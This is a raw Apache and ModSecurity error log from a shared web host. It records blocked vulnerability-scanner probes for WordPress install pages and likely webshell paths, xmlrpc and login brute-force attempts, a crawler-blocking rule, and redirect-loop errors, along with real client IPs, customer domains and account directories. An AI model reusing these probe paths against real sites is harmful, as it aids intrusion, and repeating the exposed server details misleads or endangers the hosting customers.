[Tue May 26 17:14:52.659728 2026] [security2:error] [pid 860158:tid 860399] [client 54.205.63.235:55567] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "khatucity.com"] [uri "/backup/wp-admin/setup-config.php"] [unique_id "ahWHtIYFlz_JJsUnscLIEAAAAPQ"]
[Tue May 26 17:14:52.659872 2026] [security2:error] [pid 860158:tid 860345] [client 54.205.63.235:55564] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "khatucity.com"] [uri "/wp/wp-admin/setup-config.php"] [unique_id "ahWHtIYFlz_JJsUnscLIDQAAAL4"]
[Tue May 26 17:14:52.660025 2026] [security2:error] [pid 860158:tid 860347] [client 54.205.63.235:55565] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "khatucity.com"] [uri "/wordpress1/wp-admin/setup-config.php"] [unique_id "ahWHtIYFlz_JJsUnscLIDgAAAMA"]
[Tue May 26 17:14:52.660059 2026] [security2:error] [pid 860158:tid 860304] [client 54.205.63.235:55566] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "khatucity.com"] [uri "/staging/wp-admin/setup-config.php"] [unique_id "ahWHtIYFlz_JJsUnscLIDwAAAJU"]
[Tue May 26 17:14:52.660098 2026] [security2:error] [pid 860158:tid 860400] [client 54.205.63.235:55568] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "khatucity.com"] [uri "/wp-admin/install.php"] [unique_id "ahWHtIYFlz_JJsUnscLIEQAAAPU"]
[Tue May 26 17:14:52.660554 2026] [security2:error] [pid 860158:tid 860318] [client 54.205.63.235:55570] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "khatucity.com"] [uri "/old/wp-admin/install.php"] [unique_id "ahWHtIYFlz_JJsUnscLIEgAAAKM"]
[Tue May 26 17:14:52.660558 2026] [security2:error] [pid 860158:tid 860410] [client 54.205.63.235:55572] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "khatucity.com"] [uri "/wordpress1/wp-admin/install.php"] [unique_id "ahWHtIYFlz_JJsUnscLIEwAAAP8"]
[Tue May 26 17:14:52.660797 2026] [security2:error] [pid 860158:tid 860320] [client 54.205.63.235:55569] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "khatucity.com"] [uri "/wordpress/wp-admin/install.php"] [unique_id "ahWHtIYFlz_JJsUnscLIFAAAAKU"]
[Tue May 26 17:14:52.660832 2026] [security2:error] [pid 860158:tid 860391] [client 54.205.63.235:55573] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "khatucity.com"] [uri "/wp/wp-admin/install.php"] [unique_id "ahWHtIYFlz_JJsUnscLIFQAAAOw"]
[Tue May 26 17:14:52.661287 2026] [security2:error] [pid 860158:tid 860348] [client 54.205.63.235:55575] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "khatucity.com"] [uri "/demo/wp-admin/install.php"] [unique_id "ahWHtIYFlz_JJsUnscLIFgAAAME"]
[Tue May 26 17:14:52.661368 2026] [security2:error] [pid 860158:tid 860406] [client 54.205.63.235:55571] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "khatucity.com"] [uri "/staging/wp-admin/install.php"] [unique_id "ahWHtIYFlz_JJsUnscLIGAAAAPs"]
[Tue May 26 17:14:52.661517 2026] [security2:error] [pid 860158:tid 860366] [client 54.205.63.235:55574] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "khatucity.com"] [uri "/backup/wp-admin/install.php"] [unique_id "ahWHtIYFlz_JJsUnscLIFwAAANM"]
[Tue May 26 17:14:52.813483 2026] [security2:error] [pid 860158:tid 860408] [client 54.205.63.235:55687] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "khatucity.com"] [uri "/test/wp-admin/install.php"] [unique_id "ahWHtIYFlz_JJsUnscLIHAAAAP0"]
[Tue May 26 17:14:53.444926 2026] [autoindex:error] [pid 860158:tid 860322] [client 147.185.132.31:58012] AH01276: Cannot serve directory /home1/vcress4h/vcresco-usa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:53.528528 2026] [security2:error] [pid 860158:tid 860338] [client 20.29.64.60:3272] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ktmadvance-senegal.com"] [uri "/wp-plain.php"] [unique_id "ahWHtYYFlz_JJsUnscLIMwAAALc"], referer: www.google.com
[Tue May 26 17:14:53.535816 2026] [autoindex:error] [pid 860158:tid 860382] [client 45.86.200.21:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-content/uploads/2025/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:53.822522 2026] [autoindex:error] [pid 860158:tid 860356] [client 45.86.200.21:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-content/uploads/2026/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:54.001946 2026] [security2:error] [pid 860158:tid 860327] [client 20.29.64.60:3276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ktmadvance-senegal.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWHtoYFlz_JJsUnscLIQAAAAKw"], referer: www.google.com
[Tue May 26 17:14:54.168923 2026] [security2:error] [pid 860158:tid 860298] [client 45.86.200.21:33665] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHtoYFlz_JJsUnscLIRAAAAI8"]
[Tue May 26 17:14:54.448357 2026] [security2:error] [pid 860158:tid 860334] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHtoYFlz_JJsUnscLIQwAAALM"]
[Tue May 26 17:14:55.609338 2026] [security2:error] [pid 860158:tid 860405] [client 203.194.101.7:52461] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWHt4YFlz_JJsUnscLIbQAAAPo"]
[Tue May 26 17:14:55.609505 2026] [security2:error] [pid 860158:tid 860405] [client 203.194.101.7:52461] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWHt4YFlz_JJsUnscLIbQAAAPo"]
[Tue May 26 17:14:56.547291 2026] [security2:error] [pid 860158:tid 860306] [client 52.167.144.166:45930] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahWHuIYFlz_JJsUnscLIiAAAAJc"]
[Tue May 26 17:14:56.698632 2026] [security2:error] [pid 860158:tid 860305] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHuIYFlz_JJsUnscLIhwAAAJY"]
[Tue May 26 17:14:57.360295 2026] [security2:error] [pid 860158:tid 860388] [client 20.29.64.60:3275] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ktmadvance-senegal.com"] [uri "/ftmtqkke.php"] [unique_id "ahWHuYYFlz_JJsUnscLImQAAAOk"], referer: www.google.com
[Tue May 26 17:14:58.590018 2026] [security2:error] [pid 860158:tid 860411] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHuoYFlz_JJsUnscLIsgAAAQA"]
[Tue May 26 17:15:00.290510 2026] [security2:error] [pid 860158:tid 860361] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHu4YFlz_JJsUnscLI5gAAAM4"]
[Tue May 26 17:15:01.221920 2026] [security2:error] [pid 860158:tid 860382] [client 207.46.13.141:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.bigpapaairbnbhotel.com"] [uri "/index.php"] [unique_id "ahWHvIYFlz_JJsUnscLI6gAA4ys"]
[Tue May 26 17:15:02.138843 2026] [security2:error] [pid 860158:tid 860237] [remote 74.7.241.58:44402] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWHvoYFlz_JJsUnscLJLQAAzk4"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 17:15:02.314301 2026] [security2:error] [pid 860158:tid 860313] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHvYYFlz_JJsUnscLJIAAAAJ4"]
[Tue May 26 17:15:03.202701 2026] [autoindex:error] [pid 860158:tid 860333] [client 195.3.220.7:0] AH01276: Cannot serve directory /home1/taote1zo/public_html/.tmb/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://google.com/
[Tue May 26 17:15:03.767607 2026] [autoindex:error] [pid 860158:tid 860314] [client 195.3.220.7:0] AH01276: Cannot serve directory /home1/taote1zo/public_html/.tmb/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://google.com/
[Tue May 26 17:15:04.117231 2026] [core:error] [pid 860158:tid 860408] [client 195.3.220.7:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://google.com/
[Tue May 26 17:15:04.117257 2026] [core:error] [pid 860158:tid 860408] [client 195.3.220.7:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://google.com/
[Tue May 26 17:15:04.465892 2026] [core:error] [pid 860158:tid 860304] [client 195.3.220.7:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://google.com/
[Tue May 26 17:15:04.465916 2026] [core:error] [pid 860158:tid 860304] [client 195.3.220.7:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://google.com/
[Tue May 26 17:15:04.507405 2026] [security2:error] [pid 860158:tid 860384] [client 14.166.204.126:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHwIYFlz_JJsUnscLJcgAAAOU"]
[Tue May 26 17:15:05.305732 2026] [security2:error] [pid 860158:tid 860366] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHwIYFlz_JJsUnscLJmQAAANM"]
[Tue May 26 17:15:05.827580 2026] [security2:error] [pid 860158:tid 860347] [client 203.194.101.7:52809] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWHwYYFlz_JJsUnscLJvgAAAMA"]
[Tue May 26 17:15:05.827734 2026] [security2:error] [pid 860158:tid 860347] [client 203.194.101.7:52809] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWHwYYFlz_JJsUnscLJvgAAAMA"]
[Tue May 26 17:15:06.230051 2026] [autoindex:error] [pid 860158:tid 860316] [client 195.3.220.7:0] AH01276: Cannot serve directory /home1/taote1zo/public_html/wp-content/uploads/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://google.com/
[Tue May 26 17:15:06.369717 2026] [security2:error] [pid 860158:tid 860244] [remote 51.91.98.45:50014] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWHwoYFlz_JJsUnscLJzgAA7FU"]
[Tue May 26 17:15:06.579685 2026] [security2:error] [pid 860158:tid 860356] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHwoYFlz_JJsUnscLJywAAAMk"]
[Tue May 26 17:15:06.591798 2026] [autoindex:error] [pid 860158:tid 860296] [client 195.3.220.7:0] AH01276: Cannot serve directory /home1/taote1zo/public_html/wp-content/uploads/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://google.com/
[Tue May 26 17:15:06.689702 2026] [security2:error] [pid 860158:tid 860348] [client 185.191.171.12:51640] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/11/"] [unique_id "ahWHwoYFlz_JJsUnscLJ6AAAAME"]
[Tue May 26 17:15:06.689866 2026] [security2:error] [pid 860158:tid 860348] [client 185.191.171.12:51640] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/11/"] [unique_id "ahWHwoYFlz_JJsUnscLJ6AAAAME"]
[Tue May 26 17:15:06.885104 2026] [security2:error] [pid 860158:tid 860306] [client 40.77.167.16:31078] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahWHwoYFlz_JJsUnscLJ5wAAAJc"]
[Tue May 26 17:15:06.949043 2026] [autoindex:error] [pid 860158:tid 860340] [client 195.3.220.7:0] AH01276: Cannot serve directory /home1/taote1zo/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://google.com/
[Tue May 26 17:15:07.497650 2026] [autoindex:error] [pid 860158:tid 860373] [client 195.3.220.7:0] AH01276: Cannot serve directory /home1/taote1zo/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://google.com/
[Tue May 26 17:15:08.187900 2026] [security2:error] [pid 860158:tid 860405] [client 74.7.175.167:56584] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.rbkgroups.co.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWHxIYFlz_JJsUnscLKEAAA-h4"]
[Tue May 26 17:15:08.224662 2026] [security2:error] [pid 860158:tid 860397] [client 74.7.175.169:53100] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.rbkgroups.co.in.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWHxIYFlz_JJsUnscLKGQAA8kg"]
[Tue May 26 17:15:08.290817 2026] [http2:info] [pid 869189:tid 869189] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 17:15:08.636019 2026] [security2:error] [pid 860158:tid 860367] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHxIYFlz_JJsUnscLKGAAAANQ"]
[Tue May 26 17:15:08.735863 2026] [core:error] [pid 869189:tid 869322] [client 195.3.220.7:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://google.com/
[Tue May 26 17:15:08.735887 2026] [core:error] [pid 869189:tid 869322] [client 195.3.220.7:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://google.com/
[Tue May 26 17:15:09.085898 2026] [core:error] [pid 869189:tid 869374] [client 195.3.220.7:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://google.com/
[Tue May 26 17:15:09.085928 2026] [core:error] [pid 869189:tid 869374] [client 195.3.220.7:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://google.com/
[Tue May 26 17:15:09.604825 2026] [core:error] [pid 869189:tid 869384] [client 195.3.220.7:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://google.com/
[Tue May 26 17:15:09.604849 2026] [core:error] [pid 869189:tid 869384] [client 195.3.220.7:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://google.com/
[Tue May 26 17:15:09.951850 2026] [core:error] [pid 869189:tid 869400] [client 195.3.220.7:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://google.com/
[Tue May 26 17:15:09.951872 2026] [core:error] [pid 869189:tid 869400] [client 195.3.220.7:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://google.com/
[Tue May 26 17:15:10.301186 2026] [core:error] [pid 869189:tid 869414] [client 195.3.220.7:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://google.com/
[Tue May 26 17:15:10.301218 2026] [core:error] [pid 869189:tid 869414] [client 195.3.220.7:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://google.com/
[Tue May 26 17:15:10.648925 2026] [core:error] [pid 869189:tid 869440] [client 195.3.220.7:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://google.com/
[Tue May 26 17:15:10.648946 2026] [core:error] [pid 869189:tid 869440] [client 195.3.220.7:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://google.com/
[Tue May 26 17:15:10.996268 2026] [core:error] [pid 869189:tid 869374] [client 195.3.220.7:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://google.com/
[Tue May 26 17:15:10.996286 2026] [core:error] [pid 869189:tid 869374] [client 195.3.220.7:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://google.com/
[Tue May 26 17:15:11.301553 2026] [security2:error] [pid 869189:tid 869321] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHxtB5TZSn88J_orrh0AAAAAE"]
[Tue May 26 17:15:11.334552 2026] [security2:error] [pid 869189:tid 869394] [client 157.55.39.195:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bigpapaairbnbhotel.com"] [uri "/index.php"] [unique_id "ahWHx9B5TZSn88J_orrh7AAASg0"]
[Tue May 26 17:15:11.343315 2026] [core:error] [pid 869189:tid 869395] [client 195.3.220.7:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://google.com/
[Tue May 26 17:15:11.343342 2026] [core:error] [pid 869189:tid 869395] [client 195.3.220.7:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://google.com/
